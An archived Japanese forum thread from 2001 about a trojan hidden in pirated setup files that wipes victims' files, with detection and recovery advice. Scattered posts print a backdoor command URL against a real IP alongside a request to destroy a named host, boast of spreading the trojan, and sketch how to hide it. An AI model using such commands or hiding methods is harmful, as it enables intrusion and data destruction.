レジストリ内をWhistler %System%\whismng.exe -nextで検索かければ
間違いない、という認識でokですか？

現状で、Whistlerに関しては大丈夫みたいだけど。。。

起動時読み込みだけが自爆ぢゃ無い。。
HKEY_LOCAL_MACHINE〜CurrentVersion\Run
・・だけが、起動時読み込みぢゃ無い。。

若し、誰かがある意図で割れに組み込んでるとしたら
後は組み込む奴のアイデア次第。
脅かすつもりでなく。。

>>312
それを言ったらきりがないと思われ。
とりあえず厨房向けにはあれでよいと思う。

>>311
とりあえず -next という文字列が特徴的なので -next で検索かければいい
んじゃない？漏れだったらそれでやると思う。
たとえば %System%のところはProgram FilesとかTmpとか簡単に変えられ
そうだけど、-next っていう引数を変えるのはめんどくさそうなので。

>>312
ある意図っていうのが気になるヨ。どんな意図が考えられる？
貧弱な漏れの脳みそには考えつかないヨ。

>>313
そだね。。。同意。
しっかし、こんだけの破壊ルーチン組んであって、尚且つ伝染させるのに
メール使わないで、、、直結ファイルシェアリング恐るべし。。
確実にウイルス実行させる要素としては十分なのか。。割れは。

>>314
組む奴にしてみれば大義名分立つし被害届も出難いし、今後的に用心する
に越した事無いね。色々出てきそう。。←この辺も有るかな「ある意図」
・・感染被害を自分の手はなるべく汚さずに広げると。vir厨にありがち。


組む奴が純粋？なvir厨で無い場合も有るだろうけど。。。その方が厄介
かな。

これから先ﾌｧｲﾙ名や潜伏先を変えながら
しぶとく生き続けることも考えられ。

>>312
というより、ここはWhistlerのスレだからいいんだよ。
302もWhistlerに関してのまとめでしょ。

>>312
>起動時読み込みだけが自爆ぢゃ無い。。
>HKEY_LOCAL_MACHINE〜CurrentVersion\Run
>・・だけが、起動時読み込みぢゃ無い。。

んなことは誰でも知ってる。
いったい誰に対してのレス？

>>307
なるほど。
漏れはドライブ名を割り当ててはいなかったから無事だったのか。

おれも２３３に近い。同じかどうかはわからない。
HDDフォーマット後に、XP２６００をクリーンインストールそしてMUIをインストール
そしてantivirus2002Eをインストール。どれもMXで最近よく出回っているやつ。
OS標準のプログラムをいろいろ起動したり、OS再起動しても問題なく例のwhismngも
検索で出てこない。ここまで問題なし。
でインターネットに繋ぎノートンをアップデート問題なし。ウイルス見つからず。
ここで、興味本位にXPのWINDOWS UPDATEができるのかMSのＨＰに繋いだら、
FLASHの更新がどうたらこうたらとダイアログがでたので「OK」ボタンか何かを押した。
その後からだったと思うが、妙にエラーめーっセージが出だしマイクロソフトに
エラー報告をするかどうかのダイアログが度々でるようになった。それで再起動しよう
と思いデスクトップ上のアイコンがすぺて消えた後、終了できずHDDがうなりだした。
まったく起動できなくなったのでCD-ROMから上書きインストールしたら起動。
ファイルは消えてはなかった。なんだったんだ？？？

>>320
それはWhistlerとは全然関係ないと思うよ。

>>320
ブラウザはＩＥ5.5ＳＰ２？

そんなことより聞いてくれよ>>1よ。スレと関係おおありなんだけどさ。
昨日、家のパソコン起動したんです。パソコン。
そしたらなんかファイルがめちゃくちゃ消えてくんです。(;´Д｀)

>近頃
Whistlerって書いてるけど、Whiterなんでしょ？
ういるす名。

>>324
33ﾊﾞｲﾄに書き換えちゃうのは、Whistlerだと思う

日付: 2001/10/14 ､ 時刻: 1:29:48 ､ ：：：：： (：：：：： 上)
ﾌｧｲﾙ
C:\Documents and Settings\＊＊＊＊\Local Settings\Temporary Internet Files\Content.IE5\WV332OPD\fst[1].js
は Trojan.JS.Clid.gen ｳｨﾙｽに感染しています｡
このﾌｧｲﾙを修復できません｡


日付: 2001/10/14 ､ 時刻: 1:29:48 ､ ：：：：： (：：：：： 上)
ﾌｧｲﾙ
C:\Documents and Settings\＊＊＊＊\Local Settings\Temporary Internet Files\Content.IE5\WV332OPD\fst[1].js
は Trojan.JS.Clid.gen ｳｨﾙｽに感染しています｡
ﾌｧｲﾙへのｱｸｾｽが拒否されました｡


ノートンでこんなんになりました
再起動しても平気かなぁ？？

こんなんがNimdaみたいな勢いで広まったら怖いなー。。

まだ再起動してないっす・・・

少しは調べれば？
ttp://www.symantec.com/region/jp/sarcj/data/t/trojan.js.clid.gen.html

おまけにこのスレとは関係なし。
Whistlerか調べたいなら、もっとこのスレ読めよ。

俺もずっと思っていたんだけど、このウイルスの名前は "Whiter" でしょ。
>>324 が正しいと思う。
Whistler のキージェネに仕込まれていたから Whistler っていう名前が
ところどころに出てきていると思っていたのだけど違う？
間違ってたら指摘してください。

>>329
シマンテックは一番初めにみましたよ

ただ
Trojanで探したんで　勘違いしてたんです
はい　ごめんなさい
そんな命令口調でかかなくってもねぇ・・・

名前が議論になってますが、シマンテックで登録されているwhiterで
統一したほうがいいと思います。

トレンドマイクロはwhistlerというウィルスがありますが、その症例は
ファイルサイズを1バイトにするだけです。しかしここでの症例は
33バイトにした後削除するという明らかに違うウィルスなので
分けて使ったほうがいいと思います。

ということはウィルスバスターは対応してないのかも。

ノー�d先生曰く

W32.Whiter.Trojan

W32.Whiter.Trojan は、Windows XP(Whistler)の
キー生成プログラムを装ったトロイの木馬です。

このトロイの木馬が起動すると、メモ帳(Notepad.exe)を開き、
一見正当に見えるキーを表示します。しかし実際には、
そのキーは正当なものではなく、ランダムに生成されたただの数値です。
このキーが表示されている間にトロイの木馬は自分自身をシステムに
挿入し、コンピュータが次に起動されたときにハードディスク上のすべての
ファイルを削除します。


別名: Trojan.Win32.Whiter.a, W95/Phistler.A

種別: トロイの木馬

感染サイズ: 57,344 バイト

発見日: 01/09/24

対応日: 01/09/24

"Whistler"っていう単語が出てきたのは>>72から
Dimensions3のセットアッププログラム実行後に出来たプログラムが
whismng.exe で、レジストリを見ると"Whistler"っていう表記がでてくる

僕は厨房なので、レジストリに出てくる"Whistler"っていう表記が何を意味するのかわからないし、
シマンテックとかが名前を決めてるのなら、それに従ってればいいと思う
ただ、名前ぐらいでそんなにムキになるのはどうかと思う

そうだね、名前なんてどっちでもいいよね。

>>332

自分はそのトレンドマイクロでいう「whistler」にやられた厨房です。
このスレ見てて自分の症状とは違うなーと思っていたところでした。
おっしゃる通り、削除や33バイト等ではなく全て1バイトにされてしまいます。

そこでひとつ質問なんですが、こっちの「whistler」で1バイトにされたファイルは
修復可能なんでしょうか？
FinalData(パーソナル)を実行しましたが、過去に自分で削除したファイルが1割程度
復元出来るだけでした。
トレンドマイクロのウィルスデータベースでは、「システムの修復もできないので
再インストールをする必要がある」としか書かれていませんでした…(鬱

ワレザー

>>337
いまさらそんなこと言われても。。。

>>336
多分無理です。
エンタープライズ版は、ファイルサイズを自分で入力する機能がありますが、
全部のファイルに対してそれをやるのはかなり面倒です。

ファイナルデータばかり聞くが､Undeleteって使ってる人
ほとんどいないのか？
つい最近までWin2k用はそれしかなかったからそれを
買ったのだが。
もっとも、どちらのソフトでもこのスレのケースでは復旧
できないことに変わりはないであろう。

MXで落とした.FCDってヤバイですか？

341さん
やばい。というより、ＭＸそれ自体がかなり危険なソフトなんだが、ダウンロード板
の奴らは分かっているのかどうなのか全くこのことについてはふれてない。
要はＩＰ丸出しで交換している事自体がシステム攻撃を食らうことにつながるのは
決して珍しい話ではないと言うことだ。
現に交換掲示板などではそのような被害もでているのが確認されている。
また、本当かは知らないが、ＵＰの場合に決してカウンター画面に出てこない形を
使い、隠れてリスト内データを盗まれていく事、または共有してない部分まで見られて
その部分を勝手に動かされる事などもあったと、報告されているのを読んだ
こともある。もっともこれは本当かは分からない。しかし複数の証言を読んだ事から
あり得ない話でもなさそうだ。
それと、ＦＣＤそれ自体はマウントした後を動かせなくても、悪意があって作成中のＦＣＤ
の中にトロイを忍ばされている可能性は高い。
普通のエロゲーを起動したら筒抜けになった、などという可能性だ。
相手に情報読まれ放題と覚悟するべき。
相手が黙ってくれるエロゲーはまず疑ってかかった方がいい。
有名なエロゲーを交換したら形だけのダミーでインストールも出来ない
おまけに引っかからないウィルス付きなんて珍しくない。またそんなものが
幾本も交換され、広がっている事もある。
他人にディスク内を解放するだけの覚悟が無いと、痛い思いをするだけだろうな。
虫籠に放って放置だけがむかつくやつの対処法ではないし、初心者が騒いで
知っているやつは黙っている。そういうことを覚悟の上なら交換はいいと思う。

すまん、エロゲーをも含めてのＦＣＤだ。最近一般ゲームに飽きて
エロゲーにはまっているなどと、他人とは違う道を行っているため
ついこんな書き方になったしまった。
鬱dasi脳。
エロゲーの部分はゲームかFCDと置き換えて読んでほしい。
ちなみに一般向けだろうが、アプリだろうがエロゲーだろうが、
それ自体で作動される物は皆疑った方がいいと言うこと。
ｽﾏｿ

FCDの中身が見れるツールで、セットアップだけ異常に日付が新しいとか、
そういうファイルを探せば安心でしょう。

まあ、それでも日付なんかどうとでも変えられる、だけど人によれば
実に親切な形で交換してくれるし、しかしそれが誰だか全く判らない
のがこの手の問題なんよ。

まぁたいていの奴はある程度を覚悟を持ってMXやってるでしょ。

俺も5時間前にやられたよ。
必ずウィルスチェックはかけてるんだけどね。

たまたまディスクユーティリティーをいじった後で
リブートした時に「スキャンディスクのスケジュールがある」
って出て2000のブート中にスキャンディスクかかったりして、
これ自体は関係無いとは思うけど、結果これのせいで発見が遅れた。

ブートしてウィンの起動後いつまでたってもＨＤＤがガーガーいってて
ブート途中のメッセージもあったことだし
スキャンディスクか何かだろうと思ったけど、一応調べたのね。
タスクマネージャーでＣＰＵ食いまくってるプログラムがあって、
まぁこれがc:\WINNT\system32\whismng.exeだったんだけど
以前に一度MyDocument全部消された経験があったもんで
一応ディスクのサイズとかファイルが消えてないか見てみたら、
Ｄドライブの空き容量が増えているのに気づいて
さっきのプロセスを停止した。
レジストリから起動されたんだね、このプログラム。
バックアップの翌々日だったし
その後落としたファイルそのものの殆どは
そのディレクトリが消される前に気づいたおかげで消えてなくって、
結局被害は落として展開した後ファイルが大きいから消してしまった
EasyCD5 だけですみました。あ、あと、6時間の時間も無駄になった。

これからはシャットダウンする前にレジストリのぞくようにします。

>>347
んで、なんていうソフトに入ってたの？

>>348
今調べています。
でもこのスレで既出のもの以外です。

厨房ですみませんが、
これって感染する前の状態では、
プログラム本体はsetup.exe とかの中に埋もれているのですか？

>>349
そうです。setupに入っていると思います。
セットアップを起動した瞬間にインストールされる可能性大。

なーるほど、こうやって実装してたのね。
すっげー簡単だし何にでも組み込めるぞこりゃ。

少なくとも言えることは、
俺の共有しているファイルを全てに
今日からこいつが組み込まれているということだ。

※皆さん、煽りは完全放置でいきましょう※

とりあえずこのスレは定期上げ

親切なレスありがとうございます。
FCDの中身が見れるツールっての探してみます。

>>354
俺の場合、FCDをISOに変換して、DAEMON-TOOLSで
そのままマウントしてウイルスチェックしてるよ。
マウントしてもEXEを起動しない限りは大丈夫。

学んだので、age

結論：
ただより高いものは無し。

おれはWINCDR6,0のアプリケーションMXで拾って実行して再起動したら
全ファイル消されてなんもできんくなったよ。

安全か確かめるには、正規版のサイズを公開すればいいんじゃ？

>>358
DicMXというのがある。
DicMXとは
ダウンロードしたファイルが完全かどうか調べるためのツールです。
ダウンロードしたファイルのハッシュ値とサイズをサーバーに送り、データベースと比較します。
みなさんが検索を行うたびにデータが蓄積されます。蓄積していきましょう。
http://cloud.prohosting.com/dicmx/

つーか、お前らは掛かったのか？
おい？

この被害ここまで広がっていたのですね。実は私もWhiterトロイの木馬の被害にあ
った１人です。
私の場合９月９日に感染し、フォルダ以外の全ファイルを削除されてしまいました。
http://ton.2ch.net/test/read.cgi/sec/997350129/
の６４９から「データが消滅」という名で書き込んでいるのが私です。９月９日の時
点で被害に遭っている方が３〜４人程度しかいなくあまり相手にされませんでした。
相手にされなかったので新スレもたてないでおきました。

皆さんＭＸという共有ソフトを入れてそれが原因で被害に遭われた方が多いようで
すが、私はＭＸというのはやったことがないし、私の場合意味不明な英文メールを
開いてしまったのが直接の原因だと思います。とにかくフォルダ以外のファイルと
いうファイルは全消去(CドライブDドライブ共に)されたので真っ青になりました。

ともかくデータが復旧可能なのかということですが・・・以下の方法はFAT32環境での
話です。(NTFSでも復旧可能なFINALDATAも８月末発売されました)

ファイルの復活にはFINALDATA(http://www.finaldata.ne.jp/)を使います。ただし今
回の被害の場合スタンダード版では復旧は無理でした。そこで業務用のエンタープラ
イズ版を使用します。私の場合、たまたま勤めている会社のＰＣに導入されていたの
で上司の了解を得、復旧作業に当たりました。

まず、被害に遭った場合、Windowsがまだ生きている場合は何もせず安全な方法で終
了してください。決してデフラグなどは実行しないこと。終了できない場合は強制
的に終了することもやむ終えないです。また被害にあったHDDにwindowsを上書きイン
ストールするのも厳禁です。で、もう一台データが消えてもかまわないＨＤＤを用意
してこのＨＤＤをマスターに繋ぎます。被害にあったＨＤＤをスレーブに繋いでくだ
さい。で、マスターのＨＤＤから起動させます。起動したらFINALDATAエンタープライ
ズ版をインストールしてもいいしCD-ROMからそのまま実行どちらでもかまないので起
動させます。あとは被害にあったHDDに対してファイルの復旧を実行してください。全
クラスタを検索範囲にした方がいいと思います。

HDDの容量によって時間が結構かかると思います。終了すると左のメニューから復旧可
能なファイルが参照できるようになります。通常の被害だとルートディレクトリ以下か
ら復旧可能ですが、今回のトロイは被害が甚大なのでどのファイルも33kbなような大
きさになってしまいこのままでは復旧は無理です。しかしエンタープライズ版では致命
的に被害を受けたファイルでもデータさえ残っていれば「回収ディレクトリ」以下から
復旧可能です。復旧できる可能性のある拡張子を持つファイルは以下の通り。

.AVI.BMP.CDR.DAT.DBF.DBX.DOC.DWG.DXF.EML.GIF.HTM.JPG.JAW.JBW.JSW.JXW
.MBX.IDX.MBX.MBX.MDB.MID.MOV.MP3.MPG.PBL.PCT.PCX.PDF.PSD.SF2.RM.RTF
.tar.tar.gz.TGA.TIF.WAB.WAV.WMF.WRK.ZIP
上の拡張子には出てきませんが、エクセル形式のファイルや一太郎１１形式のファイル
も.docと拡張子は変わってしまうもののファイルさえ壊れていなければ復旧可です。

私の場合、家族で写したデジカメの画像(jpeg)は98%復旧、ワード文書＆一太郎文書は完
全復旧、これはホント驚きでした。私はＨＰを作っていて作りかけのデータも入ってい
たのですが、gifファイルに関してはほぼ復旧、htmファイルに関しては復旧できるもの
の余計なデータも挿入されて完全な状態には戻りません、が無くなるよりましです。
あと家族で旅行に行った際デジカメの動画機能で撮影したmovファイルは復旧無理。い
くつかあったmp3ファイルはなぜかいくつかに分割されていましたが再生可能。zipなど
のアーカイブファイルはサイズが合わず復旧不可能ですが、ファイルサイズを任意に変
えることで復旧の可能性はあります。

細かい点について補足します。上記「回収ディレクトリ」にて無事復旧できたファイル
ですが、復旧したファイルはファイルサイズがすべて「1057164byte｣などと実際のファ
イルサイズよりかなり大きく、仮のファイルサイズとして復元されてしまいます。これ
を正しいファイルサイズに戻す作業が必要になります。
htmlファイルについてですが、本来</html>で終わるところ、それ以後に他のファイル
から割り込んできたデータが延々と続くので、これを削除してやる必要がありますが、
ファイル数が多いと手作業でやるのはしんどいので、エディタのマクロ処理などで自動
処理で乗り切ります。

またjpgやgifファイルについても、一度画像編集ソフトなどで開いてそのまま保存する
と元の正式なファイルサイズに戻るのでこれも自動処理で乗り切ります。

アーカイブファイルの復旧には、データサイズを元のファイルサイズよりも大きくしな
いとすべてのデータが復元できないのでファイルサイズを変更します。また変更した後
解凍ソフトで「ファイルが壊れている」とエラーを返されることがあります。この場合
WinRARなどの壊れていてもアーカイブの中身を覗けるソフトなら、復旧の可能性大です。
あとメーラーはBecky!という方もいると思いますが、最近発売されたFINALDATA エンタ
ープライズNT/2000版ならVer1形式に関しては復旧可能だそうですが、Ver2については
対応していないようです。私はいずれ対応することを期待して被害にあったHDDはそのま
まにし別なHDDを利用しています。

私の場合ほとんどファイルが復活できたのは幸運でした。エラー発生後すぐに電源を落
としその後何もしなかったのがよかったのだと思います。ともかく今回のことでファイ
ルのバックアップがいかに重要かということを思い知らされました。

長文失礼しました〜

ただFINALDATAを使ってもファイルが復活できなかったとこのスレの
ログにもあるようなので、あくまで一例として読んでください。

>>361-362
んなこたー全部わかってるっつーの。
ここセキュ板だぜ？

それよりも、割れ以外のところから感染したというのが怖い。
いったいどこから感染したのか？
361さんにはそれをぜひ割り出して欲しい。

>>364
まぁそう言うなよ。俺はこの板にほとんど来ないので、タメになったよ。
361-362サンクス

>>361-362
長げ〜よ。

>>364,367
ごめんね。もう来ません

確かに文章長すぎ

それより、聞いてくれよ。
俺がwhismng.exeを組み込んだファイルを
今日1日で40人以上が持ってったぜ。
やっほ〜、もっと頑張ろうっと。

>>370
セトアプ.exeのレジストリ書き込み値、そこはかとなくいぢっといたかね？
（ｗ

>>370
一瞬例のコピペかと思ったぜ

>>368 元気そうで良かった。FINALDATAのエンタープライズ版が使える環境であったことが一命を取り留めたって事で。
バックアップは忠実に取ったほうがいいね。

>>373
FinalData Enterprise の NT/2000版
早く誰か共有しろやごるぁ(#ﾟДﾟ)

インターネットマーフィーの法則 その１
「バックアップをすると必ず直後にやられる。」

Setupファイルを見て、トロイが仕掛けられていないか確かめる方法は無いのですか？
今は、レジストリだけ手動で確認しています。

>>374
それは違うな。正しくは
「そろそろバックアップを取ろうかなと思っている時に限ってやられる」だ。

>>376に１票

>>374
そうか、、、アレに組み込めば。。。ス、素晴らしい（･∀･）

※皆さん、煽りは完全放置でいきましょう※

とりあえず、このスレは上げることに意味がある

誰かまとめてちょ

まとめても意味がないよ。日々増えてるんだから。
割れには全て入っていると思ってかかったほうがいい。

煽る気じゃないけど、ウィルス仕込む奴の楽しさを知ってしまった。
ホイスラーみたいな自己増殖力の弱いやつなんて
仕組みはむちゃくちゃ簡単じゃん。
最初こいつをいじって遊んでたんだけど、
どうやって組み込むかってのを考えるのが意外や意外、むちゃくちゃ面白い。
システムディレクトリにファイルつくってレジストリに登録、を、
レジストリのスタートアップに登録されているファイルと置き換えにして、
ちょっとこってアイコンはもとのままにして、
最初の起動もたまにしか起動しないものにしてみたり。。。
みんなも一回やってみ。

>>383
マルチすんな馬鹿

>>383
そのうち、いいVirSite見つけたら、、、以下略
まぢめな？所は、色んなパーツやチュートリアル有るし。。
容量少ないから、色々いぢるには面白いかも。、、にしては奥深いし。
他人に迷惑掛けなきゃ良いんじゃない？
I-WORMいぢる時は要注意だけど。
・・・それで得た知識、防御に回せば誰も文句は言えないよ。

>>384
マ、マルチ・・・・・
う、ぅぅぅぅぅぅぅぅっ

>>383
マルチポスト一生懸命だね。
「プロフラム」を入れ替えるんだろ？（藁

>>387
そうやって言ってる奴の所に感染すると思われｗ

いいからはやくIDとファイル名教えてよ。落としに行くからさ。

昨日どっか（覚えてない）のスレで
『上をクリックしたらＰＣ逝きます』ってあった
おそいよ・・・・・・
何が起きたかわかる人います？

http://www.zdnet.co.jp/news/0110/19/b_1018_08.html
一応貼っとく

>>391
おお、有益な情報ｻﾝｸｽ（ｗ

定期上げです

33バイト被害がこちらでもございました。(泣)
whismng.exeでした。

うちの被害は

Ｃドライブ：
　デスクトップ直置きファイル＞消滅
　デスクトップにフォルダ作って置いてあるファイル＞全て正常
　マイドキュメントフォルダ内ファイル＞フォルダだけ残し全て消滅
　それ以外＞正常。ただし、レジストリのWindows\Current〜\run\に
　　　　　　whismng /next （うろ覚え）が書き込まれていた。
Ｄドライブ：全フォルダが、フォルダのみ残し、全滅
Ｅドライブ：ルートのフォルダの８中５が、フォルダのみ残し、全滅
　　　　　　残りの３のうち２において、それぞれサブフォルダ１つずつが
　　　　　　フォルダのみ残し全滅、他は正常
　　　　　　他１は正常。
こんな結果となりました。あはは　はは。

>>394
記述漏れあり。
Ｄ：とＥ：のルートにあるファイルは全滅でした。

>>394
DとEの被害が中途半端なのは、
消している作業中にそれに気がついて電源を落としたりしたからじゃない？
俺も途中で切ったので半分くらいは残ってた。

>394ｿｰｽ何？

何のソフトをインストしたのかが知りたい

Adobe dimensions 3.0J
Adobe Streamｌine
Acrobat5J
午後のこーだ
Virturl PC 4.1
AI将棋2002.zip(34,840,870バイト)
Adobe PageMaker6.0
WINCDR6

リスト出してみた。
参考までに・・・・

MXは危険だ
やはり割れはWebに限る

あと、

Lightwave3D ver7

も追加ね。

それにしてもここは名刷れですね。（途中ちょっと荒れてるけど）
進行役が実にすばらしいんですね。（さながら国際Ａ級のサッカーの主審のよう）

>>402
進行役なんているか？
いても複数だと思うよ。

定期的に、危険ソフトのリスト希望〜♪

MXにも危険ソフトのリストファイル流れてるけど、
なんか、2chの方が情報が多い・・・・・・（笑

リストに頼るほうが危険だと思うが・・・・

キケンでないものの md5 か CRC でも挙げたほうがよくないか？

この被害ここまで広がっていたのですね。実は私もWhiterトロイの木馬の被害にあ
った１人です。
私の場合９月９日に感染し、フォルダ以外の全ファイルを削除されてしまいました。
http://ton.2ch.net/test/read.cgi/sec/997350129/
の６４９から「データが消滅」という名で書き込んでいるのが私です。９月９日の時
点で被害に遭っている方が３〜４人程度しかいなくあまり相手にされませんでした。
相手にされなかったので新スレもたてないでおきました。

皆さんＭＸという共有ソフトを入れてそれが原因で被害に遭われた方が多いようで
すが、私はＭＸというのはやったことがないし、私の場合意味不明な英文メールを
開いてしまったのが直接の原因だと思います。とにかくフォルダ以外のファイルと
いうファイルは全消去(CドライブDドライブ共に)されたので真っ青になりました。

ともかくデータが復旧可能なのかということですが・・・以下の方法はFAT32環境での
話です。(NTFSでも復旧可能なFINALDATAも８月末発売されました)

ファイルの復活にはFINALDATA(http://www.finaldata.ne.jp/)を使います。ただし今
回の被害の場合スタンダード版では復旧は無理でした。そこで業務用のエンタープラ
イズ版を使用します。私の場合、たまたま勤めている会社のＰＣに導入されていたの
で上司の了解を得、復旧作業に当たりました。

まず、被害に遭った場合、Windowsがまだ生きている場合は何もせず安全な方法で終
了してください。決してデフラグなどは実行しないこと。終了できない場合は強制
的に終了することもやむ終えないです。また被害にあったHDDにwindowsを上書きイン
ストールするのも厳禁です。で、もう一台データが消えてもかまわないＨＤＤを用意
してこのＨＤＤをマスターに繋ぎます。被害にあったＨＤＤをスレーブに繋いでくだ
さい。で、マスターのＨＤＤから起動させます。起動したらFINALDATAエンタープライ
ズ版をインストールしてもいいしCD-ROMからそのまま実行どちらでもかまないので起
動させます。あとは被害にあったHDDに対してファイルの復旧を実行してください。全
クラスタを検索範囲にした方がいいと思います。

HDDの容量によって時間が結構かかると思います。終了すると左のメニューから復旧可
能なファイルが参照できるようになります。通常の被害だとルートディレクトリ以下か
ら復旧可能ですが、今回のトロイは被害が甚大なのでどのファイルも33kbなような大
きさになってしまいこのままでは復旧は無理です。しかしエンタープライズ版では致命
的に被害を受けたファイルでもデータさえ残っていれば「回収ディレクトリ」以下から
復旧可能です。復旧できる可能性のある拡張子を持つファイルは以下の通り。

.AVI.BMP.CDR.DAT.DBF.DBX.DOC.DWG.DXF.EML.GIF.HTM.JPG.JAW.JBW.JSW.JXW
.MBX.IDX.MBX.MBX.MDB.MID.MOV.MP3.MPG.PBL.PCT.PCX.PDF.PSD.SF2.RM.RTF
.tar.tar.gz.TGA.TIF.WAB.WAV.WMF.WRK.ZIP
上の拡張子には出てきませんが、エクセル形式のファイルや一太郎１１形式のファイル
も.docと拡張子は変わってしまうもののファイルさえ壊れていなければ復旧可です。

＞407
あの〜、その話確か前にも聞いたんですけど
被害に遭われてお気の毒だと思いますが
そんな事とっくにわかってるんで
よそでやって下さい。

33バイトウイルスって
Win2Kのみに感染するんですか？

>>408
コピペにマジな反応するなよ・・・
別人がやってるんだろ。本人はもういないよ。

ソフトの作者が怒って毒混ぜてたとしたら笑えるな

>>411
WinGlooveとか

>>411
笑えないよ

33バイトウイルスはOSの種類に関係なく感染するんですか？

http://www.durian-jp.com/04/html/main1.html
思わずwhismng.exeを検索しちゃったよ。

>415
どんなウィルス？

>>416
単なるエロサイト。開いて見ればびびった理由がわかる。

>417
(￣○￣)ア(￣о￣)ホ!！
ウソ八百だなｗ
逝ってよし！

>>418
ウソじゃないけど、いまはとじてるようだ。
ADSMなんちゃらがDドライブを消すとかいうアプレットが
開くんだけど、実際はなにもしないってこと。

>>419
そかそか。
とじてたのね。
このズタズタウィルス

ふぅ。昨日やられたよ。３３バイト。懲りずにMXでFinalDataエンタープライズ
のNT,２０００を探す。こっちは空っぽだから、交換も出来ないし、落とし始めると
ROMとして切断される。ふぅ。懲りないよな。復旧しても割れに手を出す自分が見える。
ということで、MXでエンタプライズさがそっと。

>>421
鶏なみの学習能力？

カス！すごいウイルスよこせ！

すっげー面白いスレ。一気に読んじゃったよ。
MXはどーも引っかかるところがあったんで手を出さなかったけど、正解
だったね。
　ＨＤ前消し喰らったら俺だったらもう立ち直れないだろなぁ…。合掌。
　

>>424
俺もMX引っかかる点があって、ずっとやってなかったんだけど、
友達が来たときに偶然やってみて、それから一週間後に２００GB飛んだよ・・・

名スレの予感・・・

しゃれにならない名スレだ・・・

>>424
俺も、そう思ってMX入れてなかったけど、
ちょっと探し物あったから入れようと思ってたところだった。
やっぱ、自力でさがそっと

>>425

♪ウィルス被害♪　自慢スレ
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1003953769

MP3とか動画だけなら大丈夫でしょ？

MXインストールしようとしたとき英語がウザくてやめちゃったけど…。
お馬鹿でよかった。
　平気で割れをインストールするからなぁ、漏れ。ライトウェーブ７なんて
絶対インストールしてたところだね(苦笑)。
　

>>431
別にライトウェーブ７だって、

・インストール後、再起動する前にwhismng.exeを削除

すればウイルスの影響無しに使うことが出来るぞ。

>428
俺も同じ。
ＭＸダウンして入れようか迷ってたとこ。
このスレに感謝。

割れ物って何を指すの？厨房です、まじ教えて下さい

>>434
われもの【割れ物・破れ物】
（1）割れやすい物。特に、ガラス器・陶磁器など。「―注意」
（2）割れた物。

warez=商用ソフトの違法コピーのこと。
アングラな物

というか、MXだけが感染源じゃないよ、、。サードパーティーサイトに置いてあるMX本体だって危ないだろうし、web割れずだって危ないし、あのにFTPなんかめちゃめちゃ危険だよ。MXで割れやらないのは対策になってないべ。

一応感染容疑のファイルリスト作って共有しとこっと。誰もいらないだろうけど。

http://www5.tok2.com/home/violet/violet_rose.top.htm

http://www5.tok2.com/home/violet/violet_rose.top.htm
よかったら来てねｖ

２ちゃんはクラッカー多いな。

結構出回りだしてるんだろうからもう我系どこでも危ないんだろうね。
鬱。

＞433
ＭＸやってなくてもやられたって話あるし
ＷＥＢで２次配布やってんのは疑った方がいいぞ。

そうだね。

MX　＝　危ない

とか見当違いなことを言ってる奴は、いつかやられると思う。
何が危険なのか全然わかってない。

Win2kなどでその怪しげなアプリをインストールしたあとusers権限でログインすれば
フォーマットなどの危険なことはさけれらないでしょうか？
users権限はあまりに不便なので環境がかたまるまでPowerUsersで使用してる
ことが多いので不安です。

>>445
関係ないと思う。
というか普通アドミニで使わない？

PGPディスクでも入れとけ。
大事なデータの入ってるDISKは。
それで防げるんじゃないの？

>>446
そういうやつ多いな。でもなUNIXだって普段rootで作業せんだろ？
普段アドミで作業するのは避けよう。

>>445
わからんがPowerUserでインストールしたらウイルスも
PowerUser権限で動く危険は高いと思うけどな。

age2

なんか性病みたいな感じだNe!

つーか、ＨＤＤは物理的に壊れない限り、復旧可能。
フォーマットしても、実は、消えていない。

>>452 上書きはさすがにきつい。フォーマットとは違うから。

ここ見たらウィルス作りたくなってきた。

>>454
外にださないでネ♪

ちゃんと自分のカゴの中で飼いましょう！（笑

MXでwin版のぷよぷよもやばい。注意されたし。

>>456
ぷよぷよのサイズわからん？

>>452

復旧可能って？
おまえこのスレ読んだのか？
このスレのパターンだと
大金はらわんとまともな復旧できねーぞ。

age

http://211.13.210.40/scripts/root.exe?/c+dir+"c:\

株式会社サイバービジョン (CyberVision Co.,Ltd.)
CV-NET [211.13.210.0 <-> 211.13.210.127] 211.13.210.0/25
メディアエクスチェンジ株式会社 (Media EXchange, Inc.)
SUBA-200-C07 [サブアロケーション] 211.13.210.0

211.14.241.
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.14.240.0-211.14.241.0
b. [ネットワーク名] KATCH-NET
f. [組織名] 株式会社キャッチネットワーク
g. [Organization] KATCH Network Inc.
m. [運用責任者] TK998JP
n. [技術連絡担当者] YO349JP
p. [ネームサーバ] ns.katch.ne.jp
p. [ネームサーバ] ns2.katch.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 2000/09/26
[返却年月日]
[最終更新] 2001/03/28 11:50:23 (JST)
[email protected]

cj3049748-b.nrima1.kt.home.ne.jp
この常時接続のアポーのパソコンをウイルスで壊して

>>461
なんで？

それができるほどスキルがあれば、こんなとこにはいないよ

落としたファイルは３ヶ月ぐらい寝かせて置くって言うのはダメ？
でウイルススキャン・・・

>>464
たしかに安全度は増すけど
「ウィルスは未知のモノである」っていうからさ
それでも駄目な場合もあるよ

>>452
>つーか、ＨＤＤは物理的に壊れない限り、復旧可能。
>フォーマットしても、実は、消えていない。

何にも知らないくせに書き込むなよ。
このウイルスは単なるフォーマットみたいな甘いものじゃないんだよ。
良く読め。
フォーマットなら復旧できることは常識だ。誰でも知ってる。

旦那のPCが同じようなウイルスで逝きました。
ここに書いてあるような症状と似ているのですが････
同じ思いをされた方がもしいらっしゃれば。

まず最初にデスクトップに『舞』という名のアイコンが無数に増えていき、
なぜか同時にメディアプレイヤーの更新ダイアログも立ちました。
何も実行した覚えはなく、
MXでCodec集とモー娘の動画をDLしている途中でした。
『舞』を解凍しますというダイアログが急に出たと思ったら
アイコンが無数に増え、マウスが動かなくなり固まりました。
再起動すると、BIOSから先に進まなくなり、
結果、Me再インストールとなりました。
インストール後、C・Dドライブ共にすべてのファイルが１バイトとなっており
めちゃめちゃに壊れておりました。
ファイナルデータを使いましたが復旧は無理でした。
Linux、VisualBasicに至るまで仕事で必要なものまですべて破壊、
激しく鬱になっております。

動画『ザ･ピース』(180M近辺）・Codec集には気をつけてください！
相手はT1の環境だったと言うことを覚えています。

只今少しづつ復活させております。
ＭＸの怖さを震撼させられる出来事でした。
旦那とLANにしてなかったのが不幸中の幸いでしょうか…。

疑問がひとつ

＞何も実行した覚えはなく

この点が腑に落ちない

